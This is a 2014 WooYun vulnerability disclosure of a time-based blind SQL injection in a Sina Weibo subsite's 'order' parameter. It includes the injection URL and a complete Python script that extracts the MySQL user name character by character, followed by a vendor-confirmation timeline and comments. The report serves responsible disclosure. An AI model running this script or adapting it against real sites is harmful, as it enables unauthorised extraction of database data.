新浪微博某站点一处MySQL注射(附验证脚本)

编号84801
Urlhttp://www.wooyun.org/bug.php?action=view&id=84801
漏洞状态厂商已经确认
漏洞标题新浪微博某站点一处MySQL注射(附验证脚本)
漏洞类型SQL注射漏洞
厂商新浪微博
白帽子lijiejie
提交日期2014-11-26 15:25:00
公开日期2015-01-10 15:26:00
修复时间(not set)
确认时间2014-11-27 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank8
厂商评级
厂商评rank8
漏洞简介
新浪微博某站点一处MySQL注射(附验证脚本)
漏洞细节

注入点:

http://lady.weibo.com/hiddphp.php?ac=getwb&bid=1&limit=20&page=1&type=&u=&_=1416952728705&order=1


参数order可注入。MySQL time blind。
页面有检查Referer,测试时需设定。

POC

猜解user(),长度18,得到了不完整的:

[email protected]


weibo_01.png


脚本附上:

#encoding=gbk
import httplib
import time
import string
import sys
import urllib
import random
headers = {
'Cookie': 'YFDPOOL=usrmdinst_3',
'Referer': 'http://lady.weibo.com',
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('[email protected]_.')
print '[%s]Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1,19): # length(user()) = 18
for payload in payloads:
try:
conn = httplib.HTTPConnection('lady.weibo.com', timeout=90)
s = "1%2b" + "sleep(ascii(mid(lower(user())from(%s)for(1)))=%s)" % (i, ord(payload))
conn.request(method='GET',
url='/hiddphp.php?ac=getwb&bid=1&limit=20&page=1&type=&u=&_=1416952728705&order=' + s,
headers = headers)
html_doc = conn.getresponse().read()
conn.close()
if html_doc.find('unknown error') >= 0:
raise Exception('oooops')
print '.',
except Exception, e:
user += payload
sys.stdout.write('\r[In progress]' + user)
sys.stdout.flush()
break
print '\n[Task done at %s]MySQL user is %s' % (
time.strftime('%H:%M:%S', time.localtime()),
user)

修复方案

过滤 转换

状态信息 2014-11-26: 细节已通知厂商并且等待厂商处理中
2014-11-27: 厂商已经确认,细节仅向厂商公开
2014-12-07: 细节向核心白帽子及相关领域专家公开
2014-12-17: 细节向普通白帽子公开
2014-12-27: 细节向实习白帽子公开
2015-01-10: 细节向公众公开
厂商回复感谢关注新浪安全,安全问题正在修复中。
回应信息危害等级:中漏洞Rank:8 确认时间:2014-11-27 16:32
Showing 1-6 of 6 items.
评论内容评论人点赞数评论时间

好厉害 关注LZ好久了 学到了好多 感谢~

廷廷02014-11-26 22:04:00

3哥好内涵,哈哈,威客众测@zeracker

greg.wu02014-11-26 17:47:00

@盛大网络 万元云豆吗

zeracker02014-11-26 17:42:00

@盛大网络 号被盗了么 - -!

_Thorns02014-11-26 17:15:00

近日江湖风声鹊起,安全隐患层出不穷,新浪微博诚邀白帽子切磋技艺于攻防之间。避免殃及无辜,特此申请@appsecssrc 这一测试帐号供诸位玩耍。首位成功进入@appsecssrc 的私信箱、完成私信中的任务,并且能完整描述过程的白帽子,将能获得价值万元的大奖~ (转发)

盛大网络02014-11-26 17:12:00

醉了

bey0nd02014-11-26 15:34:00